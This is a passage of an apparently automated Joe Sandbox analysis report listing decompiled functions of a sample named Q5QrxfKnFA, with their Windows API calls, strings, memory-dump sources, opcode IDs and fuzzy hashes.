                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003B222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003B2255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 31a55a0b810022c35ad3e43d0f449c845b1d4e5811c2ca29f11e6533597b597e
                                                        • Instruction ID: 8595a4dc15c6824eb53a9083ba81d09e208c5b33a0109ec61f775937f94ec461
                                                        • Opcode Fuzzy Hash: 31a55a0b810022c35ad3e43d0f449c845b1d4e5811c2ca29f11e6533597b597e
                                                        • Instruction Fuzzy Hash: A811A370541225BEDB268F518C84EF7FBACFF16759F108B2AFA159A800D2705950D6F0
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C14,004052F8,?,?,?), ref: 0035096E
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        • _wcscat.LIBCMT ref: 00384CB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FullNamePath_memmove_wcscat
                                                        • String ID: S@
                                                        • API String ID: 257928180-58448795
                                                        • Opcode ID: a05a2e77c3dc69690d4af89942311c734ac77e723f5e07d7a2826b1296759a8d
                                                        • Instruction ID: 2aebc0e7340791652904dbcb2209b2da4999ae27659a8043472229e4d5cbbb56
                                                        • Opcode Fuzzy Hash: a05a2e77c3dc69690d4af89942311c734ac77e723f5e07d7a2826b1296759a8d
                                                        • Instruction Fuzzy Hash: 1511A531905209AACB47FB64C806EDE77F8FF09341B0084A6BD48EB1A5EB71A7884B15
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00398E73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: c860a605b9c1cb9a16c737d1a89a6e7f57c17f73dd51cc81401d3b4453acb286
                                                        • Instruction ID: 81b743ac30ee8bfeed689724f1f616d5e440b5dbfcfc2675d840408a48de711a
                                                        • Opcode Fuzzy Hash: c860a605b9c1cb9a16c737d1a89a6e7f57c17f73dd51cc81401d3b4453acb286
                                                        • Instruction Fuzzy Hash: D701B571E15619AB8F16EBA4CC568FE73A9AF46360B140A19F8215B3D2DF316808D690
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00398D6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 8e379beea8593c88c5ae51206a45ec2ddaa9f21ec431a580711765e516e5b9ba
                                                        • Instruction ID: 40fc934742fc500817c86a8bded2fb7d38f9c34cdcc8c0540f2254111f24cf81
                                                        • Opcode Fuzzy Hash: 8e379beea8593c88c5ae51206a45ec2ddaa9f21ec431a580711765e516e5b9ba
                                                        • Instruction Fuzzy Hash: 6201F7B1A41509ABDF17EBE0C952EFE73ACDF56340F100019B8016B2D2DF106E08D2B1
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00398DEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 2bd916b9c3d85987c274d38dd65e2ca5ab51d4ab4f6eff49e84c7bf123f97572
                                                        • Instruction ID: 2392b70bfa25e56aa756c40588b370fd5ee44a0263ebcc13a53e24f1e258196f
                                                        • Opcode Fuzzy Hash: 2bd916b9c3d85987c274d38dd65e2ca5ab51d4ab4f6eff49e84c7bf123f97572
                                                        • Instruction Fuzzy Hash: 2F01A272A55509ABDF13EBA4C952EFE77AC9F16340F100015F805AB292DE259E18D2B1
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0039C534
                                                          • Part of subcall function 0039C816: _memmove.LIBCMT ref: 0039C860
                                                          • Part of subcall function 0039C816: VariantInit.OLEAUT32(00000000), ref: 0039C882
                                                          • Part of subcall function 0039C816: VariantCopy.OLEAUT32(00000000,?), ref: 0039C88C
                                                        • VariantClear.OLEAUT32(?), ref: 0039C556
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$Init$ClearCopy_memmove
                                                        • String ID: d}?
                                                        • API String ID: 2932060187-2624098408
                                                        • Opcode ID: b7e4d1a84f31824c4c701caf3599513dad4e75811dfa2729b886ccc9b2cd4f92
                                                        • Instruction ID: 6e4c08883328d429486a9c097be3bee68a8ef58cfd976e454a9b4268ef63315a
                                                        • Opcode Fuzzy Hash: b7e4d1a84f31824c4c701caf3599513dad4e75811dfa2729b886ccc9b2cd4f92
                                                        • Instruction Fuzzy Hash: B01100719007089FC711DF9AD88499BF7F8FF08310B50852FE58AD7611D771AA44CB50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: ed00dc63669f5b474b4598915d18f3546a17162a6318e64bc3b6fe683df4bb5c
                                                        • Instruction ID: fbc6f645bdf4ab3b6dc422180f570bcc79c145ac1ac5ce7bb71d407ad42d2763
                                                        • Opcode Fuzzy Hash: ed00dc63669f5b474b4598915d18f3546a17162a6318e64bc3b6fe683df4bb5c
                                                        • Instruction Fuzzy Hash: 65E0D13350422C2BD7119755AC45FA7F7ECDB85B71F010067FD04D7051D5709A558BE0
                                                        APIs
                                                          • Part of subcall function 0037B314: _memset.LIBCMT ref: 0037B321
                                                          • Part of subcall function 00360940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0037B2F0,?,?,?,0034100A), ref: 00360945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0034100A), ref: 0037B2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0034100A), ref: 0037B303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0037B2FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                                        • Instruction ID: 9b085dde63047e27e5e53d38eedba715f6213047395f2f80660f440468e893c2
                                                        • Opcode Fuzzy Hash: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                                        • Instruction Fuzzy Hash: C1E06578200B548FE7329F25D504743BAE8EF00304F008A6CE445CB250E7B8E444CBA1
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00397C82
                                                          • Part of subcall function 00363358: _doexit.LIBCMT ref: 00363362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 9e2a1dc3fb7b91f84880aa1929d2be35efcc233ffb01e9ec2ed1095c900a6930
                                                        • Instruction ID: 1fe0963821d9bd0b0abf097be0654d5587d298b817c0515a89d955a22684b1eb
                                                        • Opcode Fuzzy Hash: 9e2a1dc3fb7b91f84880aa1929d2be35efcc233ffb01e9ec2ed1095c900a6930
                                                        • Instruction Fuzzy Hash: DFD05B323D431837D21732A97C07FDA75884F05B52F144426FB049D6D34DD2959052E9
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00381775
                                                          • Part of subcall function 003BBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0038195E,?), ref: 003BBFFE
                                                          • Part of subcall function 003BBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003BC010
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0038196D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 582185067-3257408948
                                                        • Opcode ID: 4398304e893b1303709698f936ac2407ccff6127a3d82da290bbd5c8e46ac087
                                                        • Instruction ID: b2e32753a39ed774c4c2bf876384e1d04471f604d5f45047a8739ebad8c368c7
                                                        • Opcode Fuzzy Hash: 4398304e893b1303709698f936ac2407ccff6127a3d82da290bbd5c8e46ac087
                                                        • Instruction Fuzzy Hash: 55F0C971801209DFDB16EB91C984AECBBFCAB08305F5504D9F102A64A0D7755F85DF64
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C596E
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C5981
                                                          • Part of subcall function 003A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 6516733cc7d3ad8d1835a1dc5329e26a359fd5bd12763b16948117cdcb5bf0ab
                                                        • Instruction ID: 741216a036117357188edec97117538571ba81d9c0a850ca3cc9812bf59c3f7d
                                                        • Opcode Fuzzy Hash: 6516733cc7d3ad8d1835a1dc5329e26a359fd5bd12763b16948117cdcb5bf0ab
                                                        • Instruction Fuzzy Hash: D9D0C931384711BBE669AB709C0BFE66A29AB11B51F000825B34AEA1D0C9E4A800C754
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C59AE
                                                        • PostMessageW.USER32(00000000), ref: 003C59B5
                                                          • Part of subcall function 003A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 5623709e72e038cbc720c70ed67a8b4977e7f04c3e5bb20f2001d64e51ffdf3c
                                                        • Instruction ID: d65c8bf8933b3572a00c06dedd6d6971cd778390da86d4e5706401dc655f20c7
                                                        • Opcode Fuzzy Hash: 5623709e72e038cbc720c70ed67a8b4977e7f04c3e5bb20f2001d64e51ffdf3c
                                                        • Instruction Fuzzy Hash: 29D0C9313807117BE66AAB709C0BFD66629AB16B51F000825B34AEA1D0C9E4A800C758